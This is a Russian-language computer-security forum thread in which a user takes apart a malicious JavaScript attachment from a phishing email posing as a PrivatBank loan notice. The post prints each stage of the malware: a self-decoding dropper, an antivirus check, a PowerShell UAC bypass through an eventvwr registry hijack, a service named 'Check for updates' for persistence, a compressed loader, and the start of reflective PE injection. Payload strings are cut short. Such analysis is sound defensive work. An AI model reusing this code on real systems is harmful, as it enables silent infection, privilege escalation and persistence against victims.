Форум программистов, компьютерный форум, киберфорум
Наши страницы
Компьютерная безопасность
Войти
Регистрация
Восстановить пароль
 
Рейтинг 4.67/6: Рейтинг темы: голосов - 6, средняя оценка - 4.67
bliver
1 / 1 / 0
Регистрация: 15.08.2017
Сообщений: 13
1

Анализ вируса

04.12.2017, 14:41. Просмотров 1169. Ответов 16
Метки нет (Все метки)

Здравствуйте!
Пришло мне письмо
Уважаемый клиент, на Ваше имя был оформлен кредит в ПриватБанке, более подробно Вы можете ознакомиться в приложенном файле в котором указанна ФИО и номер телефона Вашего персонального эксперта по кредитованию, сумма, условия погашения кредита.

На Ваш адрес был направлен конверт с договором кредитования. В случае если Вы не получали конверт, Вам необходимо обратиться к Вашему персональному эксперту.
Внутри был файл javascript, мне стало интересно, что делает данный зловред.
В файле js был большой
В раскрутил и проследил по скриптам
0
Лучшие ответы (1)
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
04.12.2017, 14:41
Ответы с готовыми решениями:

Действие вируса
Добрый... Скажите кто нибудь знает как узнать, что делает вирус? (какие порты...

Название вируса
Если вирус написан на Visual Basic 2010 его имя будет например Win32/Name или...

Поиск вируса
Понимаю, что тема немного не по топику, но все же надеюсь на вашу помощь. Пишу...

Никак не могу избавиться от вируса
Уже около 3 месяцев очень беспокоит вирус. Суть его заключается в том, что он...

После вируса пропал интернет
Доброго всем время суток! Проблема следующая: два компьютера работают в...

16
magirus
Почетный модератор
Эксперт по компьютерным сетямЭксперт Windows
27956 / 15677 / 959
Регистрация: 15.09.2009
Сообщений: 67,836
Записей в блоге: 78
04.12.2017, 14:43 2
вам нужна помощь в лечении?
0
bliver
1 / 1 / 0
Регистрация: 15.08.2017
Сообщений: 13
04.12.2017, 14:47  [ТС] 3
Я хотел разобраться в том, что делает этот вирус. Допустимо ли здесь на сайте обсуждение о том что делает вирус, когда проникает в систему?
0
Sandor
Вирусоборец
13116 / 11332 / 1762
Регистрация: 08.10.2012
Сообщений: 45,842
04.12.2017, 14:53 4
Перенес в общий раздел.
0
bliver
1 / 1 / 0
Регистрация: 15.08.2017
Сообщений: 13
04.12.2017, 18:31  [ТС] 5
1. Сам скрипт

Javascript
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
OPOWDPWDDWED321KMML2ML2M3L1KM2L3K232V32GFCGCG1H2 = new ActiveXObject("Scripting.FileSystemObject");
OPOWDPWDDWED321KMML2MI2M3L1KM2L3K232V32GFCGCG1H2 = OPOWDPWDDWED321KMML2ML2M3L1KM2L3K232V32GFCGCG1H2.OpenTextFile(WScript.ScriptFullName,1);
abcd231243124141412412414123231241412="";
abcd231243124141412412424123231241412="0x";
abcd231243124141412412444123231241412="//";
while(!OPOWDPWDDWED321KMML2MI2M3L1KM2L3K232V32GFCGCG1H2.AtEndOfStream)
    {abcd231243224141412412414123231241412=OPOWDPWDDWED321KMML2MI2M3L1KM2L3K232V32GFCGCG1H2.ReadLine();
        if(abcd231243224141412412414123231241412.substr(0,2)==abcd231243124141412412444123231241412)
        {abcd231243224141412412414123231241412=abcd231243224141412412414123231241412.substr(2);
            abcd231243234141412412414123231241412="";
            for(i=0;i<abcd231243224141412412414123231241412.length;i+=2)
            {abcd231243234141412412414123231241412+=String.fromCharCode(abcd231243124141412412424123231241412+abcd231243224141412412414123231241412.substr(i,2));}
            abcd231243124141412412414123231241412+=abcd231243234141412412414123231241412;}
    }
OPOWDPWDDWED321KMML2MI2M3L1KM2L3K232V32GFCGCG1H2.Close();OPOWDPWDDWED321KMML2MS2M3L1KM2L3K232V32GFCGCG1H2=new ActiveXObject("WScript.Shell");
lpth=OPOWDPWDDWED321KMML2MS2M3L1KM2L3K232V32GFCGCG1H2.ExpandEnvironmentStrings("%TEMP%")+"\laksasokpaslkak.js";
OPOWDPWDDWED321KMML2MI2M3L1KM2L3K232V32GFCGCG1H2=OPOWDPWDDWED321KMML2ML2M3L1KM2L3K232V32GFCGCG1H2.CreateTextFile(lpth);
OPOWDPWDDWED321KMML2MI2M3L1KM2L3K232V32GFCGCG1H2.WriteLine (abcd231243124141412412414123231241412);
OPOWDPWDDWED321KMML2MI2M3L1KM2L3K232V32GFCGCG1H2.Close();OPOWDPWDDWED321KMML2MS2M3L1KM2L3K232V32GFCGCG1H2.Run("wscript " + lpth,2,-1);
в начале скрипта был большой комментарий, пару строк с него
//76617220646C6C446174613D224A453942636E4967505342416533304E4369525051584A794C6B466B5A4367784E7977674A7A4A6E654656315A7A46 55656B6F
//354D556335627A4A3564546779625852515A5846555548426D62457377557A4254526D564862465A59556B5A4B4E577074624735475A577331554564 344B314A
здесь было не сложно понять, в этом комментарии содержался текст в формате unicode, скрипт извлекал текст скрипта и запускал на выполнение

Добавлено через 2 часа 25 минут
2. Такой скрипт содержался в комментарии (строкb base64 я полностью не приводил):
Javascript
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
var dllData = "JE9BcnIgPSBAe30NC....";
dllData = '$data="' + dllData + '"';
WScript.Interactive = false;
function avCheck() {
    var PsWMI, PsProcesses, PsProcess;
    try { PsWMI = GetObject("winMgmts:"); }
    catch (e) {
        if (e != 0)
        { WScript.Quit(); }
    }
    PsProcesses = new Enumerator(PsWMI.ExecQuery("SELECT * FROM Win32_Process"));
    while (!PsProcesses.atEnd()) {
        PsProcess = PsProcesses.item();
        if ((PsProcess.Name == 'avp.exe') || (PsProcess.Name == 'ekrn.exe'))
        { WScript.Quit(); }
        PsProcesses.moveNext();
    }
}
avCheck();
function makerndps1() {
    var text = "";
    var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    for (var i = 0; i < 5; i++) text += possible.charAt(Math.floor(Math.random() * possible.length));
    return text + '.ps1';
} var localFile = makerndps1();
var Shell = WScript.CreateObject('WScript.Shell');
var arch = Shell.environment("system").item("processor_architecture");
var runStr; if (arch.substr(arch.length - 2) == "64")
{ runStr = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File " + localFile; }
else { runStr = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File " + localFile; }
function base64_decode(data) {
    var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, i = 0, enc = '';
    do {
        h1 = b64.indexOf(data.charAt(i++));
        h2 = b64.indexOf(data.charAt(i++));
        h3 = b64.indexOf(data.charAt(i++));
        h4 = b64.indexOf(data.charAt(i++));
        bits = h1 << 18 | h2 << 12 | h3 << 6 | h4;
        o1 = bits >> 16 & 0xff;
        o2 = bits >> 8 & 0xff;
        o3 = bits & 0xff;
        if (h3 == 64) enc += String.fromCharCode(o1);
        else if (h4 == 64) enc += String.fromCharCode(o1, o2);
        else enc += String.fromCharCode(o1, o2, o3);
    }
    while (i < data.length); return enc;
}
function d(data) {
    var f = WScript.CreateObject("Scripting.FileSystemObject");
    f.DeleteFile(data);
}
var code = 'JE9TQXJjaGl0ZWN0dXJl.........';
var decode = base64_decode(code);
var ostream = WScript.CreateObject('ADODB.Stream');
ostream.Open();
ostream.Position = 0;
ostream.Type = 2;
ostream.Charset = "UTF-8";
ostream.WriteText(dllData);
ostream.WriteText("\n");
ostream.WriteText(decode);
ostream.saveToFile(localFile, 2);
ostream.Close();
try { Shell.Run(runStr, 0, true); }
catch (ex) { };
d(localFile);
здесь тоже все понятно.
сначала проверяет присутствуют ли в системе антивирусы (касперский или НОД), если находит, прекращает работу.
Если все ок, извлекает код из base64, создает файл в корне windows shell, помещает туда файл с кодом и записывает данные которые размещены строке dlldata и запускает на исполнение

Добавлено через 53 минуты
3. Дальше интереснее
привожу код который был в строке code
Bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
$data="JE9BcnIgPSBAe30N"  //данные из предыдущего скрипта
$OSArchitecture = (Get-WmiObject -Class Win32_OperatingSystem | Select-Object    OSArchitecture -ErrorAction Stop).OSArchitecture
if ($OSArchitecture -Eq '64-bit') {
    $ppshome = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0'
} else {
    $ppshome = 'C:\Windows\System32\WindowsPowerShell\v1.0'
}
function Invoke-EventVwrBypass {
    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
    Param (
        [Parameter(Mandatory = $True)]
        [ValidateNotNullOrEmpty()]
        [String]
        $Command,
        [Switch]
        $Force
    )
    $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
    $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop
    if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){
        exit
    } else {
        $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command"
        $Command = $ppshome + '\powershell.exe ' + $Command
        if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
            New-Item $mscCommandPath -Force |
                New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
        }else{
            exit
        }
        if (Test-Path $mscCommandPath) {
        }else{
            exit
        }
        $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe'
        if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) {
            $Process = Start-Process -FilePath $EventvwrPath -PassThru
        }
        if (-not $PSBoundParameters['WhatIf']) {
            Start-Sleep -Seconds 5
        }
        $mscfilePath = "HKCU:\Software\Classes\mscfile"
        if (Test-Path $mscfilePath) {
            Remove-Item $mscfilePath -Recurse -Force
        }
        if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){
            Stop-Process -Id $Process.Id
        }
    }
}
$dstFile = [System.IO.Path]::GetRandomFileName() + '.ps1'
$file = $env:temp + '\' +$dstFile
[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($data)) | Out-File -Encoding "ASCII" $file
$command = "&{cmd /c move '"+ $file +"' '" +$ppshome+"';"
$service = 'sc create checkupdate binpath= "%COMSPEC% /C start %COMSPEC% /C ' + $ppshome + '\powershell.exe -ExecutionPolicy Bypass -File ' + $ppshome +'\' +$dstFile+'" start= delayed-auto DisplayName= "Check for updates"'
$command = $command + "cmd /c $service;"
$command = $command + "cmd /c sc start checkupdate}"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
Invoke-EventVwrBypass -Command "-enc $encodedCommand"
здесь проверяются некоторые параметры безопасности и если все хорошо, то создается служба с именем "Check for updates", которая запускает команду с следующим скриптом, так же подчищаются данные в журнале собитий

Добавлено через 8 минут
что что содержалось в строке dlldata, строки я не приводил полностью чтобы не захламлять сообщение
Bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$OArr = @{}
$OArr.Add(17, '2gxUug.....'
$OArr.Add(3, '3g/uvrl6.....'
$OArr.Add(5, 'vEMeuEGO......'
$OArr.Add(6, 'SLUX725MW......'
$OArr.Add(2, '2sYv355U//.....'
$OArr.Add(10, 'PZs588Ob7.....'
$OArr.Add(11, 'D8uHAoPlq.....'
$OArr.Add(13, 'Pn/zbXy7d.....'
$OArr.Add(9, 'ZlenL9u3x08....'
$OArr.Add(12, 'cv3/3E3S/e....'
$OArr.Add(16, 'dD+H+9SfDx.....'
$OArr.Add(18, 'hzI0P+jNxD.....'
$OArr.Add(14, '5NMBONb4f6.....'
$OArr.Add(15, 'r2f69JeI/2.....'
$OArr.Add(8, 'b65CvEV7/Xl.....'
$OArr.Add(7, '986Ir7JPeb4.....'
$OArr.Add(4, '794Mkr8nN4f.....'
$OArr.Add(19, 'AzSO+eucJL.....'
$OArr.Add(1, '7b0HYBxJliU.....'
$OFS = ''
$EncodedCompressedFile = [string]($OArr.GetEnumerator() | Sort-Object Name | %{$_.Value})
$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress);
$UncompressedFileBytes = New-Object Byte[](63848)
$DeflatedStream.Read($UncompressedFileBytes, 0, 63848) | Out-Null
([Text.Encoding]::ASCII.GetString($UncompressedFileBytes)) | IEX
здесь закодирован по алгоритму Deflate самый главный скрипт
0
bliver
1 / 1 / 0
Регистрация: 15.08.2017
Сообщений: 13
04.12.2017, 18:47  [ТС] 6
4. Ну и самое интересное - это скрип который должна уже запускать служба
здесь уже моих познаний оказалось не достаточно, чтобы понять что делать данный скрипт, я не смог понять что содержится в строке strexp, то ли это двоичный код, то ли MSIL
Возможно у кого-то будут мысли, что же все таки он делает?
Bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
$strexp = "TVqQAAMAAAAEAAAA//8AALgAA"
Function XorByteArr
{
    Param
    (
        [Parameter(Position = 0, Mandatory = $True)] [Byte[]] $ByteArr,
        [Parameter(Position = 1, Mandatory = $True)] [Byte] $XorKey
    )
    for($i=0; $i -lt $ByteArr.Length ; $i++)
    {
        $ByteArr[$i] = $ByteArr[$i] -bxor $XorKey
    }
    return $ByteArr
}
Function Base64DecodeByteArr
{
  Param
    (
    [Parameter(Position = 0, Mandatory = $True)] [Byte[]] $ByteArr
  )
  return [System.Convert]::FromBase64CharArray($ByteArr, 0, $ByteArr.Length)
}
#x64 and x86 in one function (choice is made up based on powershell process bitness)
Function TryElevIRDI
{
  Param
  (
    [Parameter(Position = 0, Mandatory = $True)] [string] $dllUrl_x86,
    [Parameter(Position = 1, Mandatory = $True)] [string] $dllUrl_x64,
    [Parameter(Position = 2, Mandatory = $True)] [string] $funcName,
    [Parameter(Position = 3, Mandatory = $False)] [scriptblock] $decFunc,
    [Parameter(Position = 4, Mandatory = $False)] [array] $decParams
  )
  #CONSTANTS
  $HASH_KEY = 13
  $BOOTSTRAP_MAX_LENGTH = 128
  $THREAD_WAIT_TIME = 35 * 1000
  $CHILD_PROC_TO_KILL = 'ctfmon'
  $DEBUG = $False
  #Funcs
  $Win32Funcs = New-Object System.Object
  #
  Function Get-Win32Types
    {
        $Win32Types = New-Object System.Object
 
        $Domain = [AppDomain]::CurrentDomain
        $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
        $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
 
        ############    ENUM    ############
        #Enum MagicType
        $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
        $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
        $MagicType = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
 
        ###########    STRUCT    ###########
        #Struct IMAGE_DATA_DIRECTORY
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
        ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
        ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
        $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECT
ORY
 
        #Struct IMAGE_FILE_HEADER
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
        $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
        $IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
 
        #Struct IMAGE_OPTIONAL_HEADER64
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
        ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
        ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
        ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
        ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
        ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
        ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
        ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
        ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
        ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
        ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
        ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
        ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
        ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
        ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
        ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
        ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
        ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
        ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
        ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
        ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
        ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
        ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
        ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
        ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
        ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
        ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Nul
l
        ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-N
ull
        ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Ou
t-Null
        ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
        ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
        ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
        ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
        ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Nu
ll
        ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
        ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
        ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | 
Out-Null
        ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-N
ull
        ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
        $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL
_HEADER64
 
    #Struct IMAGE_OPTIONAL_HEADER32
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)
        ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
        ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
        ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
        ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
        ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
        ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
        ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
        ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
        ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
        ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
        ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
        ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
        ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
        ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
        ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
        ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
        ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
        ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
        ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
        ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
        ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null
        ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null
        ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null
        ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null
        ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null
        ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
        ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Nul
l
        ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-N
ull
        ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Ou
t-Null
        ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
        ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
        ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
        ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
        ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Nu
ll
        ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
        ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
        ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | 
Out-Null
        ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-N
ull
        ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
        $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL
_HEADER32
 
        #Struct IMAGE_NT_HEADERS64
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
